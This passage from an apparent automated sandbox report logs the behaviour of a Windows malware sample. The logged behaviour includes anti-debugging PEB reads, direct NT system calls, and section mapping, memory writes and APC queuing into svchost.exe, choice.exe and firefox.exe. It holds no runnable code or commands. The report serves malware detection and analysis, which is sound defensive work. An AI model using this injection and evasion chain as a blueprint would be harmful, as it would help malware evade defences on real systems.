          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03627662 mov eax, dword ptr fs:[00000030h] | 2_2_03627662
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03627662 mov eax, dword ptr fs:[00000030h] | 2_2_03627662
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03643660 mov eax, dword ptr fs:[00000030h] | 2_2_03643660
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03643660 mov eax, dword ptr fs:[00000030h] | 2_2_03643660
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03643660 mov eax, dword ptr fs:[00000030h] | 2_2_03643660
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366666D mov esi, dword ptr fs:[00000030h] | 2_2_0366666D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366666D mov eax, dword ptr fs:[00000030h] | 2_2_0366666D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366666D mov eax, dword ptr fs:[00000030h] | 2_2_0366666D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630670 mov eax, dword ptr fs:[00000030h] | 2_2_03630670
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672670 mov eax, dword ptr fs:[00000030h] | 2_2_03672670
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672670 mov eax, dword ptr fs:[00000030h] | 2_2_03672670
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03633640 mov eax, dword ptr fs:[00000030h] | 2_2_03633640
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364F640 mov eax, dword ptr fs:[00000030h] | 2_2_0364F640
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364F640 mov eax, dword ptr fs:[00000030h] | 2_2_0364F640
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364F640 mov eax, dword ptr fs:[00000030h] | 2_2_0364F640
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366C640 mov eax, dword ptr fs:[00000030h] | 2_2_0366C640
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366C640 mov eax, dword ptr fs:[00000030h] | 2_2_0366C640
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362D64A mov eax, dword ptr fs:[00000030h] | 2_2_0362D64A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362D64A mov eax, dword ptr fs:[00000030h] | 2_2_0362D64A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03665654 mov eax, dword ptr fs:[00000030h] | 2_2_03665654
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363965A mov eax, dword ptr fs:[00000030h] | 2_2_0363965A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363965A mov eax, dword ptr fs:[00000030h] | 2_2_0363965A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366265C mov eax, dword ptr fs:[00000030h] | 2_2_0366265C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366265C mov ecx, dword ptr fs:[00000030h] | 2_2_0366265C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366265C mov eax, dword ptr fs:[00000030h] | 2_2_0366265C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03637623 mov eax, dword ptr fs:[00000030h] | 2_2_03637623
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DD62C mov ecx, dword ptr fs:[00000030h] | 2_2_036DD62C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DD62C mov ecx, dword ptr fs:[00000030h] | 2_2_036DD62C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DD62C mov eax, dword ptr fs:[00000030h] | 2_2_036DD62C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03635622 mov eax, dword ptr fs:[00000030h] | 2_2_03635622
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03635622 mov eax, dword ptr fs:[00000030h] | 2_2_03635622
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366C620 mov eax, dword ptr fs:[00000030h] | 2_2_0366C620
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630630 mov eax, dword ptr fs:[00000030h] | 2_2_03630630
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03660630 mov eax, dword ptr fs:[00000030h] | 2_2_03660630
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B8633 mov esi, dword ptr fs:[00000030h] | 2_2_036B8633
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B8633 mov eax, dword ptr fs:[00000030h] | 2_2_036B8633
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B8633 mov eax, dword ptr fs:[00000030h] | 2_2_036B8633
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366F63F mov eax, dword ptr fs:[00000030h] | 2_2_0366F63F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366F63F mov eax, dword ptr fs:[00000030h] | 2_2_0366F63F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C3608 mov eax, dword ptr fs:[00000030h] | 2_2_036C3608
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C3608 mov eax, dword ptr fs:[00000030h] | 2_2_036C3608
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C3608 mov eax, dword ptr fs:[00000030h] | 2_2_036C3608
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C3608 mov eax, dword ptr fs:[00000030h] | 2_2_036C3608
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C3608 mov eax, dword ptr fs:[00000030h] | 2_2_036C3608
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C3608 mov eax, dword ptr fs:[00000030h] | 2_2_036C3608
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365D600 mov eax, dword ptr fs:[00000030h] | 2_2_0365D600
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365D600 mov eax, dword ptr fs:[00000030h] | 2_2_0365D600
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EF607 mov eax, dword ptr fs:[00000030h] | 2_2_036EF607
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366360F mov eax, dword ptr fs:[00000030h] | 2_2_0366360F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704600 mov eax, dword ptr fs:[00000030h] | 2_2_03704600
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036296E0 mov eax, dword ptr fs:[00000030h] | 2_2_036296E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036296E0 mov eax, dword ptr fs:[00000030h] | 2_2_036296E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363C6E0 mov eax, dword ptr fs:[00000030h] | 2_2_0363C6E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036356E0 mov eax, dword ptr fs:[00000030h] | 2_2_036356E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036356E0 mov eax, dword ptr fs:[00000030h] | 2_2_036356E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036356E0 mov eax, dword ptr fs:[00000030h] | 2_2_036356E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036566E0 mov eax, dword ptr fs:[00000030h] | 2_2_036566E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036566E0 mov eax, dword ptr fs:[00000030h] | 2_2_036566E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AC6F2 mov eax, dword ptr fs:[00000030h] | 2_2_036AC6F2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AC6F2 mov eax, dword ptr fs:[00000030h] | 2_2_036AC6F2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036306CF mov eax, dword ptr fs:[00000030h] | 2_2_036306CF
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FA6C0 mov eax, dword ptr fs:[00000030h] | 2_2_036FA6C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D86C2 mov eax, dword ptr fs:[00000030h] | 2_2_036D86C2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365D6D0 mov eax, dword ptr fs:[00000030h] | 2_2_0365D6D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F86A8 mov eax, dword ptr fs:[00000030h] | 2_2_036F86A8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F86A8 mov eax, dword ptr fs:[00000030h] | 2_2_036F86A8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EF68C mov eax, dword ptr fs:[00000030h] | 2_2_036EF68C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640680 mov eax, dword ptr fs:[00000030h] | 2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640680 mov eax, dword ptr fs:[00000030h] | 2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640680 mov eax, dword ptr fs:[00000030h] | 2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640680 mov eax, dword ptr fs:[00000030h] | 2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640680 mov eax, dword ptr fs:[00000030h] | 2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640680 mov eax, dword ptr fs:[00000030h] | 2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640680 mov eax, dword ptr fs:[00000030h] | 2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640680 mov eax, dword ptr fs:[00000030h] | 2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640680 mov eax, dword ptr fs:[00000030h] | 2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640680 mov eax, dword ptr fs:[00000030h] | 2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640680 mov eax, dword ptr fs:[00000030h] | 2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640680 mov eax, dword ptr fs:[00000030h] | 2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03638690 mov eax, dword ptr fs:[00000030h] | 2_2_03638690
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BC691 mov eax, dword ptr fs:[00000030h] | 2_2_036BC691
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364C560 mov eax, dword ptr fs:[00000030h] | 2_2_0364C560
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E547 mov eax, dword ptr fs:[00000030h] | 2_2_0364E547
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03666540 mov eax, dword ptr fs:[00000030h] | 2_2_03666540
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03668540 mov eax, dword ptr fs:[00000030h] | 2_2_03668540
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370B55F mov eax, dword ptr fs:[00000030h] | 2_2_0370B55F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370B55F mov eax, dword ptr fs:[00000030h] | 2_2_0370B55F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363254C mov eax, dword ptr fs:[00000030h] | 2_2_0363254C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FA553 mov eax, dword ptr fs:[00000030h] | 2_2_036FA553
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03661527 mov eax, dword ptr fs:[00000030h] | 2_2_03661527
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366F523 mov eax, dword ptr fs:[00000030h] | 2_2_0366F523
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364252B mov eax, dword ptr fs:[00000030h] | 2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364252B mov eax, dword ptr fs:[00000030h] | 2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364252B mov eax, dword ptr fs:[00000030h] | 2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364252B mov eax, dword ptr fs:[00000030h] | 2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364252B mov eax, dword ptr fs:[00000030h] | 2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364252B mov eax, dword ptr fs:[00000030h] | 2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364252B mov eax, dword ptr fs:[00000030h] | 2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03633536 mov eax, dword ptr fs:[00000030h] | 2_2_03633536
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03633536 mov eax, dword ptr fs:[00000030h] | 2_2_03633536
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362753F mov eax, dword ptr fs:[00000030h] | 2_2_0362753F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362753F mov eax, dword ptr fs:[00000030h] | 2_2_0362753F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362753F mov eax, dword ptr fs:[00000030h] | 2_2_0362753F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672539 mov eax, dword ptr fs:[00000030h] | 2_2_03672539
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362B502 mov eax, dword ptr fs:[00000030h] | 2_2_0362B502
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h] | 2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h] | 2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h] | 2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h] | 2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h] | 2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h] | 2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h] | 2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h] | 2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03632500 mov eax, dword ptr fs:[00000030h] | 2_2_03632500
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366C50D mov eax, dword ptr fs:[00000030h] | 2_2_0366C50D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366C50D mov eax, dword ptr fs:[00000030h] | 2_2_0366C50D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03651514 mov eax, dword ptr fs:[00000030h] | 2_2_03651514
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03651514 mov eax, dword ptr fs:[00000030h] | 2_2_03651514
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03651514 mov eax, dword ptr fs:[00000030h] | 2_2_03651514
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03651514 mov eax, dword ptr fs:[00000030h] | 2_2_03651514
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03651514 mov eax, dword ptr fs:[00000030h] | 2_2_03651514
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03651514 mov eax, dword ptr fs:[00000030h] | 2_2_03651514
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BC51D mov eax, dword ptr fs:[00000030h] | 2_2_036BC51D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h] | 2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h] | 2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h] | 2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h] | 2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h] | 2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h] | 2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DF51B mov ecx, dword ptr fs:[00000030h] | 2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DF51B mov ecx, dword ptr fs:[00000030h] | 2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h] | 2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h] | 2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h] | 2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h] | 2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h] | 2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A5E7 mov ebx, dword ptr fs:[00000030h] | 2_2_0366A5E7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A5E7 mov eax, dword ptr fs:[00000030h] | 2_2_0366A5E7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363B5E0 mov eax, dword ptr fs:[00000030h] | 2_2_0363B5E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363B5E0 mov eax, dword ptr fs:[00000030h] | 2_2_0363B5E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363B5E0 mov eax, dword ptr fs:[00000030h] | 2_2_0363B5E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363B5E0 mov eax, dword ptr fs:[00000030h] | 2_2_0363B5E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363B5E0 mov eax, dword ptr fs:[00000030h] | 2_2_0363B5E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363B5E0 mov eax, dword ptr fs:[00000030h] | 2_2_0363B5E0
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_004238DA GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError | 0_2_004238DA
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0041F250 SetUnhandledExceptionFilter | 0_2_0041F250
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_0041A208
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00417DAA

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtSetInformationThread: Direct from: 0x775E2A6C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtQueryAttributesFile: Direct from: 0x775E2D8C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtClose: Direct from: 0x775E2A8C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtCreateKey: Direct from: 0x775E2B8C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtWriteVirtualMemory: Direct from: 0x775E482C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtProtectVirtualMemory: Direct from: 0x775E2EBC
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtAllocateVirtualMemory: Direct from: 0x775E480C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtOpenKeyEx: Direct from: 0x775E2ABC
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtQueryInformationProcess: Direct from: 0x775E2B46
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtResumeThread: Direct from: 0x775E2EDC
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtCreateUserProcess: Direct from: 0x775E363C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtOpenFile: Direct from: 0x775E2CEC
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtCreateFile: Direct from: 0x775E2F0C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtQuerySystemInformation: Direct from: 0x775E47EC
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtQueryVolumeInformationFile: Direct from: 0x775E2E4C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtDeviceIoControlFile: Direct from: 0x775E2A0C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtAllocateVirtualMemory: Direct from: 0x775E2B0C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtOpenSection: Direct from: 0x775E2D2C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtSetInformationProcess: Direct from: 0x775E2B7C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtNotifyChangeKey: Direct from: 0x775E3B4C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtReadVirtualMemory: Direct from: 0x775E2DAC
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtProtectVirtualMemory: Direct from: 0x775D7A4E
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtSetInformationThread: Direct from: 0x775D6319
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtAllocateVirtualMemory: Direct from: 0x775E3BBC
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtQueryInformationToken: Direct from: 0x775E2BCC
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtDelayExecution: Direct from: 0x775E2CFC
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtReadFile: Direct from: 0x775E29FC
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtQuerySystemInformation: Direct from: 0x775E2D1C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtWriteVirtualMemory: Direct from: 0x775E2D5C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtMapViewOfSection: Direct from: 0x775E2C3C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtAllocateVirtualMemory: Direct from: 0x775E2B1C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | NtResumeThread: Direct from: 0x775E35CC
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\choice.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\choice.exe | Section loaded: NULL target: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe protection: read write
          Source: C:\Windows\SysWOW64\choice.exe | Section loaded: NULL target: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\choice.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\choice.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\choice.exe | Thread register set: target process: 7044
          Source: C:\Windows\SysWOW64\choice.exe | Thread APC queued: target process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: BA2008
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00436CD7 LogonUserW | 0_2_00436CD7
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW | 0_2_0040D590
